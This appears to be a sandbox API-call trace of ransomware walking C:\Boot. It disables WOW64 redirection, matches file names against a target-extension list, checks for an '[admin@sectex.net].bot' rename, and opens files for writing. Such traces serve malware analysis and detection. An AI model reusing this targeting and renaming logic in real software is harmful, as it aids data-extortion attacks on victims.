	[0032.812] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x10) returned 0x7e08ec8
	[0032.812] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e08ec8, Size=0x20) returned 0x7df2f68
	[0032.812] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000
	[0032.812] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650
	[0032.812] Wow64DisableWow64FsRedirection (in: OldValue=0xa05ff58 | out: OldValue=0xa05ff58*=0x0) returned 1
	[0032.812] lstrlenW (lpString="kernel32.dll") returned 12
	[0032.813] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7df2f90 | out: hHeap=0x7d60000) returned 1
	[0032.813] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30
	[0032.813] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7df2f68 | out: hHeap=0x7d60000) returned 1
	[0032.813] Sleep (dwMilliseconds=0x64) 
	[0032.972] lstrlenW (lpString="BCD") returned 3
	[0032.972] CreateFileW (lpFileName="C:\\Boot\\BCD" (normalized: "c:\\boot\\bcd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0032.972] lstrlenW (lpString="C:\\Boot\\BCD") returned 11
	[0032.972] lstrlenW (lpString="C:\\Boot\\BCD") returned 11
	[0032.972] lstrlenW (lpString=".doc") returned 4
	[0032.972] lstrcmpiW (lpString1=".doc", lpString2="\\BCD") returned -1
	[0032.972] lstrlenW (lpString=".docx") returned 5
	[0032.972] lstrcmpiW (lpString1=".docx", lpString2="t\\BCD") returned -1
	[0032.972] lstrlenW (lpString=".pdf") returned 4
	[0032.972] lstrcmpiW (lpString1=".pdf", lpString2="\\BCD") returned -1
	[0032.972] lstrlenW (lpString=".xls") returned 4
	[0032.972] lstrcmpiW (lpString1=".xls", lpString2="\\BCD") returned -1
	[0032.972] lstrlenW (lpString=".xlsx") returned 5
	[0032.972] lstrcmpiW (lpString1=".xlsx", lpString2="t\\BCD") returned -1
	[0032.972] lstrlenW (lpString=".ppt") returned 4
	[0032.972] lstrcmpiW (lpString1=".ppt", lpString2="\\BCD") returned -1
	[0032.972] lstrlenW (lpString="C:\\Boot\\BCD") returned 11
	[0032.972] lstrlenW (lpString=".zip") returned 4
	[0032.972] lstrcmpiW (lpString1=".zip", lpString2="\\BCD") returned -1
	[0032.972] lstrlenW (lpString=".rar") returned 4
	[0032.972] lstrcmpiW (lpString1=".rar", lpString2="\\BCD") returned -1
	[0032.973] lstrlenW (lpString=".bz2") returned 4
	[0032.973] lstrcmpiW (lpString1=".bz2", lpString2="\\BCD") returned -1
	[0032.973] lstrlenW (lpString=".7z") returned 3
	[0032.973] lstrcmpiW (lpString1=".7z", lpString2="BCD") returned -1
	[0032.973] lstrlenW (lpString="C:\\Boot\\BCD") returned 11
	[0032.973] lstrlenW (lpString=".dbf") returned 4
	[0032.973] lstrcmpiW (lpString1=".dbf", lpString2="\\BCD") returned -1
	[0032.973] lstrlenW (lpString="C:\\Boot\\BCD") returned 11
	[0032.973] lstrlenW (lpString=".1cd") returned 4
	[0032.973] lstrcmpiW (lpString1=".1cd", lpString2="\\BCD") returned -1
	[0032.973] lstrlenW (lpString="C:\\Boot\\BCD") returned 11
	[0032.973] lstrlenW (lpString=".jpg") returned 4
	[0032.973] lstrcmpiW (lpString1=".jpg", lpString2="\\BCD") returned -1
	[0032.973] lstrlenW (lpString="C:\\Boot\\BCD") returned 11
	[0032.973] lstrlenW (lpString="C:\\Boot\\BCD") returned 11
	[0032.973] lstrlenW (lpString=".doc") returned 4
	[0032.973] lstrcmpiW (lpString1=".doc", lpString2="\\BCD") returned -1
	[0032.973] lstrlenW (lpString=".docx") returned 5
	[0032.973] lstrcmpiW (lpString1=".docx", lpString2="t\\BCD") returned -1
	[0032.973] lstrlenW (lpString=".pdf") returned 4
	[0032.973] lstrcmpiW (lpString1=".pdf", lpString2="\\BCD") returned -1
	[0032.973] lstrlenW (lpString=".xls") returned 4
	[0032.973] lstrcmpiW (lpString1=".xls", lpString2="\\BCD") returned -1
	[0032.973] lstrlenW (lpString=".xlsx") returned 5
	[0032.973] lstrcmpiW (lpString1=".xlsx", lpString2="t\\BCD") returned -1
	[0032.973] lstrlenW (lpString=".ppt") returned 4
	[0032.973] lstrcmpiW (lpString1=".ppt", lpString2="\\BCD") returned -1
	[0032.973] lstrlenW (lpString="C:\\Boot\\BCD") returned 11
	[0032.973] lstrlenW (lpString=".zip") returned 4
	[0032.973] lstrcmpiW (lpString1=".zip", lpString2="\\BCD") returned -1
	[0032.973] lstrlenW (lpString=".rar") returned 4
	[0032.973] lstrcmpiW (lpString1=".rar", lpString2="\\BCD") returned -1
	[0032.973] lstrlenW (lpString=".bz2") returned 4
	[0032.973] lstrcmpiW (lpString1=".bz2", lpString2="\\BCD") returned -1
	[0032.974] lstrlenW (lpString=".7z") returned 3
	[0032.974] lstrcmpiW (lpString1=".7z", lpString2="BCD") returned -1
	[0032.974] lstrlenW (lpString="C:\\Boot\\BCD") returned 11
	[0032.974] lstrlenW (lpString=".dbf") returned 4
	[0032.974] lstrcmpiW (lpString1=".dbf", lpString2="\\BCD") returned -1
	[0032.974] lstrlenW (lpString="C:\\Boot\\BCD") returned 11
	[0032.974] lstrlenW (lpString=".1cd") returned 4
	[0032.974] lstrcmpiW (lpString1=".1cd", lpString2="\\BCD") returned -1
	[0032.974] lstrlenW (lpString="C:\\Boot\\BCD") returned 11
	[0032.974] lstrlenW (lpString=".jpg") returned 4
	[0032.974] lstrcmpiW (lpString1=".jpg", lpString2="\\BCD") returned -1
	[0032.974] lstrcmpiW (lpString1=".LOG1", lpString2=".bot") returned 1
	[0032.974] lstrlenW (lpString="BCD.LOG1") returned 8
	[0032.974] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG1" (normalized: "c:\\boot\\bcd.log1"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178
	[0032.974] GetFileSizeEx (in: hFile=0x178, lpFileSize=0xa05ff1c | out: lpFileSize=0xa05ff1c*=0) returned 1
	[0032.974] CloseHandle (hObject=0x178) returned 1
	[0032.974] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16
	[0032.974] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16
	[0032.974] lstrlenW (lpString=".doc") returned 4
	[0032.975] lstrcmpiW (lpString1=".doc", lpString2="LOG1") returned -1
	[0032.975] lstrlenW (lpString=".docx") returned 5
	[0032.975] lstrcmpiW (lpString1=".docx", lpString2=".LOG1") returned -1
	[0032.975] lstrlenW (lpString=".pdf") returned 4
	[0032.975] lstrcmpiW (lpString1=".pdf", lpString2="LOG1") returned -1
	[0032.975] lstrlenW (lpString=".xls") returned 4
	[0032.975] lstrcmpiW (lpString1=".xls", lpString2="LOG1") returned -1
	[0032.975] lstrlenW (lpString=".xlsx") returned 5
	[0032.975] lstrcmpiW (lpString1=".xlsx", lpString2=".LOG1") returned 1
	[0032.975] lstrlenW (lpString=".ppt") returned 4
	[0032.975] lstrcmpiW (lpString1=".ppt", lpString2="LOG1") returned -1
	[0032.975] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16
	[0032.975] lstrlenW (lpString=".zip") returned 4
	[0032.975] lstrcmpiW (lpString1=".zip", lpString2="LOG1") returned -1
	[0032.975] lstrlenW (lpString=".rar") returned 4
	[0032.975] lstrcmpiW (lpString1=".rar", lpString2="LOG1") returned -1
	[0032.975] lstrlenW (lpString=".bz2") returned 4
	[0032.975] lstrcmpiW (lpString1=".bz2", lpString2="LOG1") returned -1
	[0032.975] lstrlenW (lpString=".7z") returned 3
	[0032.975] lstrcmpiW (lpString1=".7z", lpString2="OG1") returned -1
	[0032.975] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16
	[0032.975] lstrlenW (lpString=".dbf") returned 4
	[0032.975] lstrcmpiW (lpString1=".dbf", lpString2="LOG1") returned -1
	[0032.975] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16
	[0032.975] lstrlenW (lpString=".1cd") returned 4
	[0032.975] lstrcmpiW (lpString1=".1cd", lpString2="LOG1") returned -1
	[0032.975] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16
	[0032.975] lstrlenW (lpString=".jpg") returned 4
	[0032.975] lstrcmpiW (lpString1=".jpg", lpString2="LOG1") returned -1
	[0032.975] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16
	[0032.975] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16
	[0032.975] lstrlenW (lpString=".doc") returned 4
	[0032.975] lstrcmpiW (lpString1=".doc", lpString2="LOG1") returned -1
	[0032.975] lstrlenW (lpString=".docx") returned 5
	[0032.976] lstrcmpiW (lpString1=".docx", lpString2=".LOG1") returned -1
	[0032.976] lstrlenW (lpString=".pdf") returned 4
	[0032.976] lstrcmpiW (lpString1=".pdf", lpString2="LOG1") returned -1
	[0032.976] lstrlenW (lpString=".xls") returned 4
	[0032.976] lstrcmpiW (lpString1=".xls", lpString2="LOG1") returned -1
	[0032.976] lstrlenW (lpString=".xlsx") returned 5
	[0032.976] lstrcmpiW (lpString1=".xlsx", lpString2=".LOG1") returned 1
	[0032.976] lstrlenW (lpString=".ppt") returned 4
	[0032.976] lstrcmpiW (lpString1=".ppt", lpString2="LOG1") returned -1
	[0032.976] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16
	[0032.976] lstrlenW (lpString=".zip") returned 4
	[0032.976] lstrcmpiW (lpString1=".zip", lpString2="LOG1") returned -1
	[0032.976] lstrlenW (lpString=".rar") returned 4
	[0032.976] lstrcmpiW (lpString1=".rar", lpString2="LOG1") returned -1
	[0032.976] lstrlenW (lpString=".bz2") returned 4
	[0032.976] lstrcmpiW (lpString1=".bz2", lpString2="LOG1") returned -1
	[0032.976] lstrlenW (lpString=".7z") returned 3
	[0032.976] lstrcmpiW (lpString1=".7z", lpString2="OG1") returned -1
	[0032.976] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16
	[0032.976] lstrlenW (lpString=".dbf") returned 4
	[0032.976] lstrcmpiW (lpString1=".dbf", lpString2="LOG1") returned -1
	[0032.976] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16
	[0032.976] lstrlenW (lpString=".1cd") returned 4
	[0032.976] lstrcmpiW (lpString1=".1cd", lpString2="LOG1") returned -1
	[0032.976] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16
	[0032.976] lstrlenW (lpString=".jpg") returned 4
	[0032.976] lstrcmpiW (lpString1=".jpg", lpString2="LOG1") returned -1
	[0032.976] lstrcmpiW (lpString1=".LOG2", lpString2=".bot") returned 1
	[0032.976] lstrlenW (lpString="BCD.LOG2") returned 8
	[0032.976] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG2" (normalized: "c:\\boot\\bcd.log2"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178
	[0032.978] GetFileSizeEx (in: hFile=0x178, lpFileSize=0xa05ff1c | out: lpFileSize=0xa05ff1c*=0) returned 1
	[0032.978] CloseHandle (hObject=0x178) returned 1
	[0032.978] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16
	[0032.978] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16
	[0032.978] lstrlenW (lpString=".doc") returned 4
	[0032.978] lstrcmpiW (lpString1=".doc", lpString2="LOG2") returned -1
	[0032.978] lstrlenW (lpString=".docx") returned 5
	[0032.978] lstrcmpiW (lpString1=".docx", lpString2=".LOG2") returned -1
	[0032.978] lstrlenW (lpString=".pdf") returned 4
	[0032.978] lstrcmpiW (lpString1=".pdf", lpString2="LOG2") returned -1
	[0032.978] lstrlenW (lpString=".xls") returned 4
	[0032.978] lstrcmpiW (lpString1=".xls", lpString2="LOG2") returned -1
	[0032.978] lstrlenW (lpString=".xlsx") returned 5
	[0032.978] lstrcmpiW (lpString1=".xlsx", lpString2=".LOG2") returned 1
	[0032.978] lstrlenW (lpString=".ppt") returned 4
	[0032.978] lstrcmpiW (lpString1=".ppt", lpString2="LOG2") returned -1
	[0032.979] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16
	[0032.979] lstrlenW (lpString=".zip") returned 4
	[0032.979] lstrcmpiW (lpString1=".zip", lpString2="LOG2") returned -1
	[0032.979] lstrlenW (lpString=".rar") returned 4
	[0032.979] lstrcmpiW (lpString1=".rar", lpString2="LOG2") returned -1
	[0032.979] lstrlenW (lpString=".bz2") returned 4
	[0032.979] lstrcmpiW (lpString1=".bz2", lpString2="LOG2") returned -1
	[0032.979] lstrlenW (lpString=".7z") returned 3
	[0032.979] lstrcmpiW (lpString1=".7z", lpString2="OG2") returned -1
	[0032.979] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16
	[0032.979] lstrlenW (lpString=".dbf") returned 4
	[0032.979] lstrcmpiW (lpString1=".dbf", lpString2="LOG2") returned -1
	[0032.979] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16
	[0032.979] lstrlenW (lpString=".1cd") returned 4
	[0032.979] lstrcmpiW (lpString1=".1cd", lpString2="LOG2") returned -1
	[0032.979] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16
	[0032.979] lstrlenW (lpString=".jpg") returned 4
	[0032.979] lstrcmpiW (lpString1=".jpg", lpString2="LOG2") returned -1
	[0032.979] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16
	[0032.979] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16
	[0032.979] lstrlenW (lpString=".doc") returned 4
	[0032.979] lstrcmpiW (lpString1=".doc", lpString2="LOG2") returned -1
	[0032.979] lstrlenW (lpString=".docx") returned 5
	[0032.979] lstrcmpiW (lpString1=".docx", lpString2=".LOG2") returned -1
	[0032.979] lstrlenW (lpString=".pdf") returned 4
	[0032.979] lstrcmpiW (lpString1=".pdf", lpString2="LOG2") returned -1
	[0032.979] lstrlenW (lpString=".xls") returned 4
	[0032.979] lstrcmpiW (lpString1=".xls", lpString2="LOG2") returned -1
	[0032.979] lstrlenW (lpString=".xlsx") returned 5
	[0032.979] lstrcmpiW (lpString1=".xlsx", lpString2=".LOG2") returned 1
	[0032.979] lstrlenW (lpString=".ppt") returned 4
	[0032.979] lstrcmpiW (lpString1=".ppt", lpString2="LOG2") returned -1
	[0032.979] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16
	[0032.979] lstrlenW (lpString=".zip") returned 4
	[0032.980] lstrcmpiW (lpString1=".zip", lpString2="LOG2") returned -1
	[0032.980] lstrlenW (lpString=".rar") returned 4
	[0032.980] lstrcmpiW (lpString1=".rar", lpString2="LOG2") returned -1
	[0032.980] lstrlenW (lpString=".bz2") returned 4
	[0032.980] lstrcmpiW (lpString1=".bz2", lpString2="LOG2") returned -1
	[0032.980] lstrlenW (lpString=".7z") returned 3
	[0032.980] lstrcmpiW (lpString1=".7z", lpString2="OG2") returned -1
	[0032.980] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16
	[0032.980] lstrlenW (lpString=".dbf") returned 4
	[0032.980] lstrcmpiW (lpString1=".dbf", lpString2="LOG2") returned -1
	[0032.980] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16
	[0032.980] lstrlenW (lpString=".1cd") returned 4
	[0032.980] lstrcmpiW (lpString1=".1cd", lpString2="LOG2") returned -1
	[0032.980] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16
	[0032.980] lstrlenW (lpString=".jpg") returned 4
	[0032.980] lstrcmpiW (lpString1=".jpg", lpString2="LOG2") returned -1
	[0032.980] lstrcmpiW (lpString1=".mui", lpString2=".bot") returned 1
	[0032.980] lstrlenW (lpString="bootmgr.exe.mui") returned 15
	[0032.980] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178
	[0032.980] GetFileSizeEx (in: hFile=0x178, lpFileSize=0xa05ff1c | out: lpFileSize=0xa05ff1c*=89168) returned 1
	[0032.980] CloseHandle (hObject=0x178) returned 1
	[0032.980] GetFileAttributesW (lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui")) returned 0x20
	[0032.981] GetFileAttributesW (lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0032.981] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0032.981] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29
	[0032.981] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29
	[0032.981] lstrlenW (lpString=".doc") returned 4
	[0032.981] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1
	[0032.981] lstrlenW (lpString=".docx") returned 5
	[0032.981] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1
	[0032.981] lstrlenW (lpString=".pdf") returned 4
	[0032.981] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1
	[0032.981] lstrlenW (lpString=".xls") returned 4
	[0032.981] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1
	[0032.981] lstrlenW (lpString=".xlsx") returned 5
	[0032.981] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1
	[0032.981] lstrlenW (lpString=".ppt") returned 4
	[0032.981] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1
	[0032.981] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29
	[0032.981] lstrlenW (lpString=".zip") returned 4
	[0032.981] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1
	[0032.981] lstrlenW (lpString=".rar") returned 4
	[0032.981] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1
	[0032.981] lstrlenW (lpString=".bz2") returned 4
	[0032.981] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1
	[0032.981] lstrlenW (lpString=".7z") returned 3
	[0032.981] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1
	[0032.981] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29
	[0032.981] lstrlenW (lpString=".dbf") returned 4
	[0032.981] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1
	[0032.981] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29
	[0032.982] lstrlenW (lpString=".1cd") returned 4
	[0032.982] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1
	[0032.982] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29
	[0032.982] lstrlenW (lpString=".jpg") returned 4
	[0032.982] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1
	[0032.982] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29
	[0032.982] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29
	[0032.982] lstrlenW (lpString=".doc") returned 4
	[0032.982] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1
	[0032.982] lstrlenW (lpString=".docx") returned 5
	[0032.982] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1
	[0032.982] lstrlenW (lpString=".pdf") returned 4
	[0032.982] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1
	[0032.982] lstrlenW (lpString=".xls") returned 4
	[0032.982] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1
	[0032.982] lstrlenW (lpString=".xlsx") returned 5
	[0032.982] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1
	[0032.982] lstrlenW (lpString=".ppt") returned 4
	[0032.982] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1
	[0032.982] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29
	[0032.982] lstrlenW (lpString=".zip") returned 4
	[0032.982] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1
	[0032.982] lstrlenW (lpString=".rar") returned 4
	[0032.982] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1
	[0032.982] lstrlenW (lpString=".bz2") returned 4
	[0032.982] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1
	[0032.982] lstrlenW (lpString=".7z") returned 3
	[0032.982] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1
	[0032.982] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29
	[0032.982] lstrlenW (lpString=".dbf") returned 4
	[0032.982] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1
	[0032.982] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29
	[0032.982] lstrlenW (lpString=".1cd") returned 4
	[0032.982] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1
	[0032.982] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29
	[0032.983] lstrlenW (lpString=".jpg") returned 4
	[0032.983] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1
	[0032.983] lstrcmpiW (lpString1=".mui", lpString2=".bot") returned 1
	[0032.983] lstrlenW (lpString="bootmgr.exe.mui") returned 15
	[0032.983] CreateFileW (lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178
	[0032.983] GetFileSizeEx (in: hFile=0x178, lpFileSize=0xa05ff1c | out: lpFileSize=0xa05ff1c*=87616) returned 1
	[0032.983] CloseHandle (hObject=0x178) returned 1
	[0032.983] GetFileAttributesW (lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui")) returned 0x20
	[0032.983] GetFileAttributesW (lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0032.983] CreateFileW (lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0032.983] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29
	[0032.983] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29
	[0032.983] lstrlenW (lpString=".doc") returned 4
	[0032.983] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1
	[0032.983] lstrlenW (lpString=".docx") returned 5
	[0032.983] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1
	[0032.983] lstrlenW (lpString=".pdf") returned 4
	[0032.983] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1
	[0032.984] lstrlenW (lpString=".xls") returned 4
	[0032.984] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1
	[0032.984] lstrlenW (lpString=".xlsx") returned 5
	[0032.984] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1
	[0032.984] lstrlenW (lpString=".ppt") returned 4
	[0032.984] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1
	[0032.984] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29
	[0032.984] lstrlenW (lpString=".zip") returned 4
	[0032.984] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1
	[0032.984] lstrlenW (lpString=".rar") returned 4
	[0032.984] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1
	[0032.984] lstrlenW (lpString=".bz2") returned 4
	[0032.984] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1
	[0032.984] lstrlenW (lpString=".7z") returned 3
	[0032.984] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1
	[0032.984] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29
	[0032.984] lstrlenW (lpString=".dbf") returned 4
	[0032.984] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1
	[0032.984] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29
	[0032.984] lstrlenW (lpString=".1cd") returned 4
	[0032.984] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1
	[0032.984] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29
	[0032.984] lstrlenW (lpString=".jpg") returned 4
	[0032.984] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1
	[0032.984] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29
	[0032.984] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29
	[0032.984] lstrlenW (lpString=".doc") returned 4
	[0032.984] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1
	[0032.984] lstrlenW (lpString=".docx") returned 5
	[0032.984] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1
	[0032.984] lstrlenW (lpString=".pdf") returned 4
	[0032.984] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1
	[0032.984] lstrlenW (lpString=".xls") returned 4
	[0032.984] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1
	[0032.985] lstrlenW (lpString=".xlsx") returned 5
	[0032.985] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1
	[0032.985] lstrlenW (lpString=".ppt") returned 4
	[0032.985] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1
	[0032.985] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29
	[0032.985] lstrlenW (lpString=".zip") returned 4
	[0032.985] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1
	[0032.985] lstrlenW (lpString=".rar") returned 4
	[0032.985] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1
	[0032.985] lstrlenW (lpString=".bz2") returned 4
	[0032.985] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1
	[0032.985] lstrlenW (lpString=".7z") returned 3
	[0032.985] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1
	[0032.985] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29
	[0032.985] lstrlenW (lpString=".dbf") returned 4
	[0032.985] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1
	[0032.985] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29
	[0032.985] lstrlenW (lpString=".1cd") returned 4
	[0032.985] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1
	[0032.985] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29
	[0032.986] lstrlenW (lpString=".jpg") returned 4
	[0032.986] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1
	[0032.986] lstrcmpiW (lpString1=".mui", lpString2=".bot") returned 1
	[0032.986] lstrlenW (lpString="bootmgr.exe.mui") returned 15
	[0032.986] CreateFileW (lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178
	[0032.986] GetFileSizeEx (in: hFile=0x178, lpFileSize=0xa05ff1c | out: lpFileSize=0xa05ff1c*=91712) returned 1
	[0032.986] CloseHandle (hObject=0x178) returned 1
	[0032.986] GetFileAttributesW (lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui")) returned 0x20
	[0032.986] GetFileAttributesW (lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
